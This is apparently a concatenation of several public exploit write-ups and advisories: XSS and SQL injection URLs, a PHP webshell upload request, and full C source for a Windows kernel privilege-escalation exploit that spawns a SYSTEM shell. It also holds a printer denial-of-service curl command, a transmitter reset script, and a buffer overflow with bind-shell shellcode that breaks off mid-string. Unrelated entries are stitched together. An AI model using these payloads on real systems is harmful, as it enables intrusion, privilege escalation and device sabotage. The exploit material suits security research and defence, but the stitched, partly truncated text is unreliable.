# Vulnerability Type: Reflected Cross-Site Scripting
1. Description
Online Clinic Management System 2.2, does not sufficiently encode
user-controlled inputs, resulting in a Reflected Cross-Site Scripting (XSS)
vulnerability via the /clinic/events_view.php, in FirstRecord parameter.
2. Proof of Concept
http://127.0.0.1/clinic/events_view.php?SelectedID=2&record-added-ok=7758&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=
1. Description
Online Clinic Management System 2.2, does not sufficiently encode
user-controlled inputs, resulting in a Reflected Cross-Site Scripting (XSS)
vulnerability via the /clinic/disease_symptoms_view.php, in FirstRecord
parameter.
2. Proof of Concept
http://127.0.0.1/clinic/disease_symptoms_view.php?SelectedID=1&record-added-ok=1096&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=
<!--
# Exploit Title: Job Portal 1.0 - File Upload Restriction Bypass
# Date: 27-06-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://phpgurukul.com/job-portal-project/
# Software Link:
https://phpgurukul.com/?smd_process_download=1&download_id=7855
# Version: 1.0
# Tested on: Windows 7 64 Bits / Windows 10 64 Bits
# CVE :
# Category: webapps
1. Description
File Upload Restriction Bypass vulnerabilities were found in Job Portal
1.0. This allows for an authenticated user to potentially obtain RCE via
webshell.
2. Proof of Concept
1. Go the user profile >> (/jobportal/applicant/)
2.- Select profile image and load a valid image.
3. Turn Burp/ZAP Intercept On
4. Select webshell - ex: shell.png
5. Alter request in the upload...
Update 'filename' to desired extension. ex: shell.php
Not neccesary change content type to 'image/png'
Example exploitation request:
====================================================================================================
POST http://127.0.0.1/jobportal/applicant/controller.php?action=photos
HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data;
boundary=---------------------------57052814523281
Content-Length: 555
Origin: https://127.0.0.1
Connection: keep-alive
Referer: https://127.0.0.1/jobportal/applicant/index.php?view=view&id=
Cookie: PHPSESSID=qf9e02j0rda99cj91l36qcat34
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1
-----------------------------57052814523281
Content-Disposition: form-data; name="MAX_FILE_SIZE"
1000000
-----------------------------57052814523281
Content-Disposition: form-data; name="photo"; filename="shell.php"
Content-Type: image/png
?PNG
...
<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>" ?>
IEND
-----------------------------57052814523281
Content-Disposition: form-data; name="savephoto"
-----------------------------57052814523281--
====================================================================================================
6. Send the request and visit your new webshell
Ex: https://127.0.0.1/jobportal/applicant/photos/shell.php?cmd=whoami
nt authority\system
3. Solution:
Patch:
https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload
-->
# E-DB Note:
# + Source: https://github.com/sensepost/gdi-palettes-exp
# + Binary: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42432.exe
#include <Windows.h>
#include <stdio.h>
#include <winddi.h>
#include <Psapi.h>
//From http://stackoverflow.com/a/26414236 this defines the details of the NtAllocateVirtualMemory function
//which we will use to map the NULL page in user space.
typedef NTSTATUS(WINAPI *PNtAllocateVirtualMemory)(
HANDLE ProcessHandle,
PVOID *BaseAddress,
ULONG ZeroBits,
PULONG AllocationSize,
ULONG AllocationType,
ULONG Protect
);
static HBITMAP bitmaps[2000];
static HPALETTE hp[2000];
HANDLE hpWorker, hpManager, hManager;
BYTE *bits;
// https://www.coresecurity.com/blog/abusing-gdi-for-ring0-exploit-primitives
//dt nt!_EPROCESS UniqueProcessID ActiveProcessLinks Token
typedef struct
{
DWORD UniqueProcessIdOffset;
DWORD TokenOffset;
} VersionSpecificConfig;
//VersionSpecificConfig gConfig = { 0x0b4 , 0x0f8 }; //win 7 SP 1
VersionSpecificConfig gConfig = { 0x0b4 , 0x0f8 };
void SetAddress(UINT* address) {
SetPaletteEntries((HPALETTE)hpManager, 0x3FE, 1, (PALETTEENTRY*)address);
}
void WriteToAddress(UINT* data, DWORD len) {
SetPaletteEntries((HPALETTE)hpWorker, 0, len, (PALETTEENTRY*)data);
}
UINT ReadFromAddress(UINT src, UINT* dst, DWORD len) {
SetAddress((UINT *)&src);
DWORD res = GetPaletteEntries((HPALETTE)hpWorker, 0, len, (LPPALETTEENTRY)dst);
return res;
}
// Get base of ntoskrnl.exe
UINT GetNTOsBase()
{
UINT Bases[0x1000];
DWORD needed = 0;
UINT krnlbase = 0;
if (EnumDeviceDrivers((LPVOID *)&Bases, sizeof(Bases), &needed)) {
krnlbase = Bases[0];
}
return krnlbase;
}
// Get EPROCESS for System process
UINT PsInitialSystemProcess()
{
// load ntoskrnl.exe
UINT ntos = (UINT)LoadLibrary("ntkrnlpa.exe");
// get address of exported PsInitialSystemProcess variable
UINT addr = (UINT)GetProcAddress((HMODULE)ntos, "PsInitialSystemProcess");
FreeLibrary((HMODULE)ntos);
UINT res = 0;
UINT ntOsBase = GetNTOsBase();
// subtract addr from ntos to get PsInitialSystemProcess offset from base
if (ntOsBase) {
ReadFromAddress(addr - ntos + ntOsBase, (UINT *)&res, sizeof(UINT) / sizeof(PALETTEENTRY));//0x169114
}
return res;
}
// Get EPROCESS for current process
UINT PsGetCurrentProcess()
{
UINT pEPROCESS = PsInitialSystemProcess();// get System EPROCESS
// walk ActiveProcessLinks until we find our Pid
LIST_ENTRY ActiveProcessLinks;
ReadFromAddress(pEPROCESS + gConfig.UniqueProcessIdOffset + sizeof(UINT), (UINT *)&ActiveProcessLinks, sizeof(LIST_ENTRY) / sizeof(PALETTEENTRY));
UINT res = 0;
while (TRUE) {
UINT UniqueProcessId = 0;
// adjust EPROCESS pointer for next entry
pEPROCESS = (UINT)(ActiveProcessLinks.Flink) - gConfig.UniqueProcessIdOffset - sizeof(UINT);
// get pid
ReadFromAddress(pEPROCESS + gConfig.UniqueProcessIdOffset, (UINT *)&UniqueProcessId, sizeof(UINT) / sizeof(PALETTEENTRY));
// is this our pid?
if (GetCurrentProcessId() == UniqueProcessId) {
res = pEPROCESS;
break;
}
// get next entry
ReadFromAddress(pEPROCESS + gConfig.UniqueProcessIdOffset + sizeof(UINT), (UINT *)&ActiveProcessLinks, sizeof(LIST_ENTRY) / sizeof(PALETTEENTRY));
// if next same as last, we reached the end
if (pEPROCESS == (UINT)(ActiveProcessLinks.Flink) - gConfig.UniqueProcessIdOffset - sizeof(UINT))
break;
}
return res;
}
void fengshui() {
HBITMAP bmp;
// we need 2 object 0x7F4
for (int y = 0; y < 2000; y++) {
//0x3A3 = 0xFe8
bmp = CreateBitmap(0x3A3, 1, 1, 32, NULL);
bitmaps[y] = bmp;
}
//Spray LpszMenuName User object in GDI pool. Ustx
// size 0x10+8
TCHAR st[0x32];
for (int s = 0; s < 2000; s++) {
WNDCLASSEX Class2 = { 0 };
wsprintf(st, "Class%d", s);
Class2.lpfnWndProc = DefWindowProc;
Class2.lpszClassName = st;
Class2.lpszMenuName = "Saif";
Class2.cbSize = sizeof(WNDCLASSEX);
if (!RegisterClassEx(&Class2)) {
printf("bad %d %d\r\n", s, GetLastError());
break;
}
}
for (int s = 0; s < 2000; s++) {
DeleteObject(bitmaps[s]);
}
for (int k = 0; k < 2000; k++) {
//0x1A6 = 0x7f0+8
bmp = CreateBitmap(0x1A6, 1, 1, 32, NULL);
bitmaps[k] = bmp;
}
HPALETTE hps;
LOGPALETTE *lPalette;
//0x1E3 = 0x7e8+8
lPalette = (LOGPALETTE*)malloc(sizeof(LOGPALETTE) + (0x1E3 - 1) * sizeof(PALETTEENTRY));
lPalette->palNumEntries = 0x1E3;
lPalette->palVersion = 0x0300;
// for allocations bigger than 0x98 its Gh08 for less its always 0x98 and the tag is Gla18
for (int k = 0; k < 2000; k++) {
hps = CreatePalette(lPalette);
if (!hps) {
printf("%s - %d - %d\r\n", "CreatePalette - Failed", GetLastError(), k);
//return;
}
hp[k] = hps;
}
TCHAR fst[0x32];
for (int f = 500; f < 750; f++) {
wsprintf(fst, "Class%d", f);
UnregisterClass(fst, NULL);
}
}
UINT GetAddress(BYTE *buf, UINT offset) {
BYTE bytes[4];
for (int i = 0; i < 4; i++) {
bytes[i] = buf[offset + i];
}
UINT addr = *(UINT *)bytes;
return addr;
}
int main(int argc, char *argv[]) {
HWND hwnd;
WNDCLASSEX Class = { 0 };
Class.lpfnWndProc = DefWindowProc;
Class.lpszClassName = "Class";
Class.cbSize = sizeof(WNDCLASSEX);
printf(" __ ________________ ____ ________\r\n");
printf(" / |/ / ___< /__ / / __ < /__ /\r\n");
printf(" / /|_/ /\__ \/ / / /_____/ / / / / / / \r\n");
printf(" / / / /___/ / / / /_____/ /_/ / / / / \r\n");
printf("/_/ /_//____/_/ /_/ \____/_/ /_/ \r\n");
printf("\r\n");
printf(" [*] By Saif (at) SensePost \r\n");
printf(" Twitter: Saif_Sherei\r\n");
printf("\r\n");
printf("\r\n");
if (!RegisterClassEx(&Class)) {
printf("%s\r\n", "RegisterClass - Failed");
return 1;
}
hwnd = CreateWindowEx(NULL, "Class", "Test1", WS_VISIBLE, 0x5a1f, 0x5a1f, 0x5a1f, 0x5a1f, NULL, NULL, 0, NULL);
HDC hdc = GetDC(hwnd);
//0x10 is the magic number
printf("[*] Creating Pattern Brush Bitmap.\r\n");
HBITMAP bitmap = CreateBitmap(0x23, 0x1d41d41, 1, 1, NULL);
//HBITMAP bitmap = CreateBitmap(0x5aa, 0x11f, 1, 1, NULL);
if (!bitmap) {
printf("%s - %d\r\n", "CreateBitmap Failed.\r\n", GetLastError());
return 1;
}
//https://github.com/sam-b/HackSysDriverExploits/blob/master/HackSysNullPointerExploit/HackSysNullPointerExploit/HackSysNullPointerExploit.cpp
HMODULE hNtdll = GetModuleHandle("ntdll.dll");
//Get address of NtAllocateVirtualMemory from the dynamically linked library and then cast it to a callable function type
FARPROC tmp = GetProcAddress(hNtdll, "NtAllocateVirtualMemory");
PNtAllocateVirtualMemory NtAllocateVirtualMemory = (PNtAllocateVirtualMemory)tmp;
//We can't outright pass NULL as the address but if we pass 1 then it gets rounded down to 0...
//PVOID baseAddress = (PVOID)0x1;
PVOID baseAddress = (PVOID)0x1;
SIZE_T regionSize = 0xFF; //Probably enough, it will get rounded up to the next page size
// Map the null page
NTSTATUS ntStatus = NtAllocateVirtualMemory(
GetCurrentProcess(), //Current process handle
&baseAddress, //address we want our memory to start at, will get rounded down to the nearest page boundary
0, //The number of high-order address bits that must be zero in the base address of the section view. Not a clue here
®ionSize, //Required size - will be modified to actual size allocated, is rounded up to the next page boundary
MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN, //claim memory straight away, get highest appropriate address
PAGE_EXECUTE_READWRITE //All permissions
);
if (ntStatus != 0) {
printf("Virtual Memory Allocation Failed: 0x%x\n", ntStatus);
FreeLibrary(hNtdll);
return 1;
}
PVOID nullPointer = (PVOID)((UINT)0x4);
*(PUINT)nullPointer = (UINT)1;
//
printf("[*] Creating Pattern Brush.\r\n");
HBRUSH hbrBkgnd = CreatePatternBrush(bitmap);
SelectObject(hdc, hbrBkgnd);
fengshui();
printf("[*] Triggering Overflow in Win32k!EngRealizeBrush.\r\n");
//__debugbreak();
PatBlt(hdc, 0x100, 0x10, 0x100, 0x100, PATCOPY);
HRESULT res;
bits = (BYTE*)malloc(0x6F8);
for (int i = 0; i < 2000; i++) {
res = GetBitmapBits(bitmaps[i], 0x6F8, bits);
if (res > 0x6F8 - 1) {
hManager = bitmaps[i];
printf("[*] Manager Bitmap: %d\r\n", i);
break;
}
}
//__debugbreak();
//Get pFirstColor of adjacent Gh?8 XEPALOBJ Palette object
UINT pFirstColor = GetAddress(bits, 0x6F8 - 8);
printf("[*] Original Current Manager XEPALOBJ->pFirstColor: 0x%x\r\n", pFirstColor);
UINT cEntries = GetAddress(bits, 0x6F8 - 8 - 0x38);
printf("[*] Original Manager XEPALOBJ->cEntries: 0x%x\r\n", cEntries);
//BYTE *bytes = (BYTE*)&cEntries;
for (int y = 0; y < 4; y++) {
bits[0x6F8 - 8 - 0x38 + y] = 0xFF;
}
//__debugbreak();
SetBitmapBits((HBITMAP)hManager, 0x6F8, bits);
//__debugbreak();
res = GetBitmapBits((HBITMAP)hManager, 0x6F8, bits);
UINT uEntries = GetAddress(bits, 0x6F8 - 8 - 0x38);
printf("[*] Updated Manager XEPALOBJ->cEntries: 0x%x\r\n", uEntries);
UINT *rPalette;
rPalette = (UINT*)malloc((0x400 - 1) * sizeof(PALETTEENTRY));
memset(rPalette, 0x0, (0x400 - 1) * sizeof(PALETTEENTRY));
for (int k = 0; k < 2000; k++) {
UINT res = GetPaletteEntries(hp[k], 0, 0x400, (LPPALETTEENTRY)rPalette);
if (res > 0x3BB) {
printf("[*] Manager XEPALOBJ Object Handle: 0x%x\r\n", hp[k]);
hpManager = hp[k];
break;
}
}
//__debugbreak();
//for (int y = 0x3F0; y < 0x400; y++) {
// printf("%04x ", rPalette[y]);
//}
//printf("\r\n");
UINT wAddress = rPalette[0x3FE];
printf("[*] Worker XEPALOBJ->pFirstColor: 0x%04x.\r\n", wAddress);
UINT tHeader = pFirstColor - 0x1000;
tHeader = tHeader & 0xFFFFF000;
printf("[*] Gh05 Address: 0x%04x.\r\n", tHeader);
//__debugbreak();
SetAddress(&tHeader);
//SetPaletteEntries((HPALETTE)hpManager, 0x3FE, 1, (PALETTEENTRY*)&tHeader);
UINT upAddress;
GetPaletteEntries((HPALETTE)hpManager, 0x3FE, 1, (LPPALETTEENTRY)&upAddress);
printf("[*] Updated Worker XEPALOBJ->pFirstColor: 0x%04x.\r\n", upAddress);
UINT wBuffer[2];
for (int x = 0; x < 2000; x++) {
GetPaletteEntries((HPALETTE)hp[x], 0, 2, (LPPALETTEENTRY)wBuffer);
//Debug
//if (wBuffer != 0xcdcdcdcd) {
// Release
//if (wBuffer[1] == 0x35316847) {
if (wBuffer[1] >> 24 == 0x35) {
hpWorker = hp[x];
printf("[*] Worker XEPALOBJ object Handle: 0x%x\r\n", hpWorker);
printf("[*] wBuffer: %x\r\n", wBuffer[1]);
break;
}
}
UINT gHeader[8];
//gHeader = (UINT*)malloc((0x4 - 1) * sizeof(PALETTEENTRY));
//GetPaletteEntries((HPALETTE)hpWorker, 0, 4, (LPPALETTEENTRY)gHeader);
ReadFromAddress(tHeader, gHeader, 8);
//__debugbreak();
UINT oHeader = pFirstColor & 0xFFFFF000;
printf("[*] Overflowed Gh05 Address: 0x%04x.\r\n", oHeader);
UINT oValue = oHeader + 0x1C;
//SetPaletteEntries((HPALETTE)hpManager, 0x3FE, 1, (PALETTEENTRY*)&oValue);
UINT value;
//GetPaletteEntries((HPALETTE)hpWorker, 0, 1, (LPPALETTEENTRY)&value);
//printf("[*] Value: 0x%04x.\r\n", value);
ReadFromAddress(oValue, &value, 1);
//printf("[*] Gh05 Object Header:\r\n");
//printf(" %04x %04x %04x %04x\r\n", gHeader[0], gHeader[1], gHeader[2], gHeader[3]);
//printf(" %04x %04x %04x %04x\r\n", gHeader[4], gHeader[5], gHeader[6], gHeader[7]);
//SetPaletteEntries((HPALETTE)hpManager, 0x3FE, 1, (PALETTEENTRY*)&oHeader);
gHeader[2] = value;
gHeader[3] = 0;
gHeader[7] = value;
//SetPaletteEntries((HPALETTE)hpWorker, 0, 4, (PALETTEENTRY*)gHeader);
UINT oHeaderdata[8];
ReadFromAddress(oHeader, oHeaderdata, 8);
printf("[*] Gh05 Overflowed Object Header:\r\n");
printf(" %04x %04x %04x %04x\r\n", oHeaderdata[0], oHeaderdata[1], oHeaderdata[2], oHeaderdata[3]);
printf(" %04x %04x %04x %04x\r\n", oHeaderdata[4], oHeaderdata[5], oHeaderdata[6], oHeaderdata[7]);
printf("[*] Gh05 Fixed Object Header:\r\n");
printf(" %04x %04x %04x %04x\r\n", gHeader[0], gHeader[1], gHeader[2], gHeader[3]);
printf(" %04x %04x %04x %04x\r\n", gHeader[4], gHeader[5], gHeader[6], gHeader[7]);
SetAddress(&oHeader);
//__debugbreak();
WriteToAddress(gHeader, 8);
printf("[*] Fixed Overflowed Gh05 Object Header.\r\n");
//UINT uHeader[8];
//ReadFromAddress(oHeader, uHeader, 8);
//printf("[*] Gh05 Overflowed Fixed Object Header:\r\n");
//printf(" %04x %04x %04x %04x\r\n", uHeader[0], uHeader[1], uHeader[2], uHeader[3]);
//printf(" %04x %04x %04x %04x\r\n", uHeader[4], uHeader[5], uHeader[6], uHeader[7]);
// get System EPROCESS
UINT SystemEPROCESS = PsInitialSystemProcess();
//__debugbreak();
//fprintf(stdout, "\r\n%x\r\n", SystemEPROCESS);
UINT CurrentEPROCESS = PsGetCurrentProcess();
//__debugbreak();
//fprintf(stdout, "\r\n%x\r\n", CurrentEPROCESS);
UINT SystemToken = 0;
// read token from system process
ReadFromAddress(SystemEPROCESS + gConfig.TokenOffset, &SystemToken, 1);
fprintf(stdout, "[*] Got System Token: %x\r\n", SystemToken);
// write token to current process
UINT CurProccessAddr = CurrentEPROCESS + gConfig.TokenOffset;
SetAddress(&CurProccessAddr);
WriteToAddress(&SystemToken, 1);
//__debugbreak();
printf("[*] Dropping in SYSTEM shell...\r\n\r\n");
// Done and done. We're System :)
system("cmd.exe");
//getchar();
for (int f = 0; f < 2000; f++) {
DeleteObject(bitmaps[f]);
}
for (int f = 0; f < 2000; f++) {
DeleteObject(hp[f]);
}
TCHAR fst[0x32];
for (int f = 0; f < 500; f++) {
wsprintf(fst, "Class%d", f);
UnregisterClass(fst, NULL);
}
for (int f = 751; f < 2000; f++) {
wsprintf(fst, "Class%d", f);
UnregisterClass(fst, NULL);
}
ReleaseDC(hwnd, hdc);
DeleteDC(hdc);
DeleteObject(hbrBkgnd);
DeleteObject(bitmap);
FreeLibrary(hNtdll);
//free(bitmaps);
//VirtualFree(&baseAddress, regionSize, MEM_RELEASE);
//DestroyWindow(hwnd);
return 0;
}
DefenseCode ThunderScan SAST Advisory
WordPress Easy Modal Plugin
Multiple Security Vulnerabilities
Advisory ID: DC-2017-01-007
Advisory Title: WordPress Easy Modal Plugin Multiple Vulnerabilities
Advisory URL: http://www.defensecode.com/advisories.php
Software: WordPress Easy Modal plugin
Language: PHP
Version: 2.0.17 and below
Vendor Status: Vendor contacted, update released
Release Date: 2017/08/07
Risk: Medium
1. General Overview
===================
During the security audit of Easy Modal plugin for WordPress CMS,
multiple vulnerabilities were discovered using DefenseCode ThunderScan
application source code security analysis platform.
More information about ThunderScan is available at URL:
http://www.defensecode.com
2. Software Overview
====================
According to the plugin developers, Easy Modal is the #1 WordPress
Popup Plugin. It's advertised as "Make glorious & powerful popups and
market your content like never before - all in minutes!".
According to wordpress.org, it has more than 20,000 active installs.
Homepage:
http://wordpress.org/extend/plugins/easy-modal/
https://easy-modal.com
3. Vulnerability Description
============================
During the security analysis, ThunderScan discovered SQL injection
vulnerabilities in Easy Modal WordPress plugin.
The easiest way to reproduce the vulnerability is to visit the
provided URL while being logged in as administrator or another user
that is authorized to access the plugin settings page. Users that do
not have full administrative privileges could abuse the database
access the vulnerability provides to either escalate their privileges
or obtain and modify database contents they were not supposed to be
able to.
The nonce token is required as the URL parameter. Token value is not
unique for each request, nor per each URL, so if the attacker manages
to obtain a valid token value, the module could be exposed to attack
vectors such as Cross Site request forgery (CSRF).
3.1. SQL injection
Function: $wpdb->query()
Variables: $_GET['id'], $_GET['ids'], $_GET['modal']
Sample URL:
http://vulnerablesite.com/wp-admin/admin.php?page=easy-modal&action=dele
te&id%5B0%5D=4%20AND%20SLEEP(5)&easy-modal_nonce=xxx
File: easy-modal\classes\controller\admin\modals.php
---------
93 $ids = is_array($_GET['id']) ? $_GET['id'] :
array($_GET['id']);
...
97 $ids = $_GET['ids'];
...
101 $ids = $_GET['modal'];
...
110 $wpdb->query("UPDATE {$wpdb->prefix}em_modals SET
is_trash = 1 WHERE id IN (".implode(',', $ids).")");
---------
3.2. SQL injection
Function: $wpdb->query()
Variables: $_GET['id'], $_GET['ids'], $_GET['modal']
Sample URL:
http://vulnerablesite.com/wp-admin/admin.php?easy-modal_nonce=xxx&_wp_ht
tp_referer=%2Fvulnerablesite.com%2Fwp-admin%2Fadmin.php%3Fpage%3Deasy-mo
dal%26status%3Dtrash&page=easy-modal&action=untrash&paged=1&id[]=2)%20AN
D%20SLEEP(10)--%20ZpVQ&action2=-1
File: easy-modal\classes\controller\admin\modals.php
---------
123 $ids = is_array($_GET['id']) ? $_GET['id'] :
array($_GET['id']);
...
127 $ids = $_GET['ids'];
...
131 $ids = $_GET['modal'];
...
140 $wpdb->query("UPDATE {$wpdb->prefix}em_modals SET
is_trash = 0 WHERE id IN ($ids)");
---------
4. Solution
===========
Vendor resolved the security issues after we reported the
vulnerability. All users are strongly advised to update WordPress Easy
Modal plugin to the latest available version.
5. Credits
==========
Discovered with DefenseCode ThunderScan source code security analyzer
by Neven Biruski.
6. Disclosure Timeline
======================
2017/04/04 Vendor contacted
2017/04/06 Vendor responded
2017/04/13 Update released
2017/08/07 Advisory released to the public
7. About DefenseCode
====================
DefenseCode L.L.C. delivers products and services designed to analyze
and test web, desktop and mobile applications for security
vulnerabilities.
DefenseCode ThunderScan is a SAST (Static Application Security
Testing, WhiteBox Testing) solution for performing extensive security
audits of application source code. ThunderScan SAST performs fast and
accurate analyses of large and complex source code projects delivering
precise results and low false positive rate.
DefenseCode WebScanner is a DAST (Dynamic Application Security
Testing, BlackBox Testing) solution for comprehensive security audits
of active web applications. WebScanner will test a website's security
by carrying out a large number of attacks using the most advanced
techniques, just as a real attacker would.
Subscribe for free software trial on our website
http://www.defensecode.com/ .
E-mail: defensecode[at]defensecode.com
Website: http://www.defensecode.com
Twitter: https://twitter.com/DefenseCode/
# Exploit Title: Epson Stylus SX510W Printer Remote Power Off - Denial of Service (PoC)
# Discovery by: Rafael Pedrero
# Discovery Date: 2020-05-16
# Vendor Homepage: https://www.epson.es/
# Software Link :
https://www.epson.es/products/printers/inkjet-printers/for-home/epson-stylus-sx510w
# Tested Version: EPSON_Linux UPnP/1.0 Epson UPnP SDK/1.0
# Tested on: Linux/Windows
# Vulnerability Type: Denial of Service (DoS)
1. Description
The vulnerability occurs when 2 or more &'s are sent to the server in a row
("/PRESENTATION/HTML/TOP/INDEX.HTML") causing it to shutdown.
2. Proof of Concept
Request:
curl -s "http://
<printer_ip_address>/PRESENTATION/HTML/TOP/INDEX.HTML?RELOAD=&&tm=1589865865549"
3. Solution:
This version product is deprecated.
-->
#Exploit Title: TinyWebGallery v2.5 - Stored Cross-Site Scripting (XSS)
#Application: TinyWebGallery
#Version: v2.5
#Bugs: Stored Xss
#Technology: PHP
#Vendor URL: http://www.tinywebgallery.com/
#Software Link: https://www.tinywebgallery.com/download.php?tinywebgallery=latest
#Date of found: 07-05-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux
2. Technical Details & POC
========================================
steps:
1. Login to account
2. Go to http://localhost/twg25/index.php?twg_album=3_youtube.com&twg_show=Q4IPe8_Bo7c.jpg
3. Edit
4. Set folder name section as <script>alert(4)</script>
Request :
POST /twg25/i_frames/i_titel.php HTTP/1.1
Host: localhost
Content-Length: 264
Cache-Control: max-age=0
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://localhost/twg25/i_frames/i_titel.php?twg_album=3_youtube.com&twg_show=Q4IPe8_Bo7c.jpg
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=qc7mfbthpf7tnf32a34p8l766k
Connection: close
twg_album=3_youtube.com&twg_show=Q4IPe8_Bo7c.jpg&twg_foffset=&twg_submit=true&twg_titel_page2=true&twg_foldername_mod=1&twg_foldername=%26lt%3Bscript%26gt%3Balert%284%29%26lt%3B%2Fscript%26gt%3B&twg_folderdesc_mod=1&twg_folderdesc=aaaaaaaaaaaaaaaaa&twg_submit=Save
5. Go to http://localhost/twg25/index.php
#!/usr/bin/env python3
#
# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Reset Board Config
# Exploit Author: LiquidWorm
#
#
# Vendor: DB Elettronica Telecomunicazioni SpA
# Product web page: https://www.screen.it | https://www.dbbroadcast.com
# https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
# Affected version: Firmware: 1.9.3
# Bios firmware: 7.1 (Apr 19 2021)
# Gui: 2.46
# FPGA: 169.55
# uc: 6.15
#
# Summary: Screen's new radio DAB Transmitter is reaching the highest
# technology level in both Digital Signal Processing and RF domain.
# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
# digital adaptive precorrection and configuatio flexibility, the Hot
# Swap System technology, the compactness and the smart system design,
# the SFT DAB are advanced transmitters. They support standards DAB,
# DAB+ and T-DMB and are compatible with major headend brands.
#
# Desc: The application suffers from a weak session management that can
# allow an attacker on the same network to bypass these controls by reusing
# the same IP address assigned to the victim user (NAT) and exploit crucial
# operations on the device itself. By abusing the IP address property that
# is binded to the Session ID, one needs to await for such an established
# session and issue unauthorized requests to the vulnerable API to manage
# and/or manipulate the affected transmitter.
#
# Tested on: Keil-EWEB/2.1
# MontaVista® Linux® Carrier Grade eXpress (CGX)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2023-5775
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5775.php
#
#
# 19.03.2023
#
import hashlib,datetime##########
import requests,colorama#########
from colorama import Fore, Style#
colorama.init()
print(Fore.RED+Style.BRIGHT+
'''
██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████
██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██
██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██
'''
+Style.RESET_ALL)
print(Fore.WHITE+Style.BRIGHT+
'''
ZSL and the Producers insist that no one
submit any exploits of themselfs or others
performing any dangerous activities.
We will not open or view them.
'''
+Style.RESET_ALL)
s=datetime.datetime.now()
s=s.strftime('%d.%m.%Y %H:%M:%S')
print('Starting API XPL -',s)
t=input('Enter transmitter ip: ')
e='/system/api/deviceManagement.cgx'
print('Calling object: ssbtObj')
print('CGX fastcall: deviceManagement::reset')
t='http://'+t+e
bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
'Accept':'application/json, text/plain, */*',
'Accept-Language':'ku-MK,en;q=0.9',
'Accept-Encoding':'gzip, deflate',
'User-Agent':'Dabber--',
'Connection':'close'}
j={'ssbtIdx':0,
'ssbtType':'deviceManagement',
'ssbtObj':{
'reset':'true'
}
}
r=requests.post(t,headers=bh,json=j)
if r.status_code==200:
print('Done.')
else:
print('Error')
exit(-1)
#!/usr/bin/python
# Exploit Title: ALL Player v7.4 SEH Buffer Overflow (Unicode)
# Version: 7.4
# Date: 15-08-2017
# Exploit Author: f3ci
# Tested on: Windows 7 SP1 x86
head = "http://"
seh = "\x0f\x47" #0x0047000f
nseh = "\x61\x41" #popad align
junk = "\x41" * 301
junk2 = "\x41" * 45
#msfvenom -p windows/shell_bind_tcp LPORT=4444 -e x86/unicode_mixed
BufferRegister=EAX -f python
#x86/unicode_mixed succeeded with size 782 (iteration=0)
#Payload size: 782 bytes
buf = ""
buf += "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQ"
buf += "AIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYA"
buf += "ZBABABABABkMAGB9u4JBkL7x52KPYpM0aPqyHeMa5pbDtKNpNPBk"
buf += "QBjlTKaBkd4KD2mXzo87pJlfNQ9ovLOLs1cLIrnLMPGQfoZmyqI7"
buf += "GrZRobnwRk1Bn0bknjOLDKPLkaQhGsNhzawaOa4KaIO0M1XSbka9"
buf += "lXISmja9Rkp4TKM1FvMaYofLfaXOjmYqUw08wp0uJVJcqmYhmk3M"
buf += "o4rUk41HTK28NDjaFsrFRklLPK4KaHklzaICTKytbkM1VpSYa4nD"
buf += "NDOkaKaQ291JoaIoWpqOaOQJtKN2HkTMOmOxOCOBIpm0C8CGT3oB"
buf += "OopTC80L2WNFzgyoz5Txf0ZaYpm0kyfdB4np38kycPpkypIoiEPj"
buf += "kXqInp8bKMmpr010pPC8YZjoiOK0yohU67PhLBypjq1L3YzF1ZLP"
buf += "aFaGPh7R9KoGBGKO8U271XEg8iOHIoiohUaGrH3DJLOK7qIo9EPW"
buf += "eG1XBU0nnmc1YoYEC81SrMs4ip4IyS27ogaGnQjVaZn2B9b6jBkM"
buf += "S6I7oTMTMliqkQ2m14nDN0UvKPndb4r0of1FNv0Fr6nn0VR6B31F"
buf += "BH49FlmoTFyoIEbi9P0NPVq6YolpaXjhsWmMc0YoVuGKHpEe3rnv"
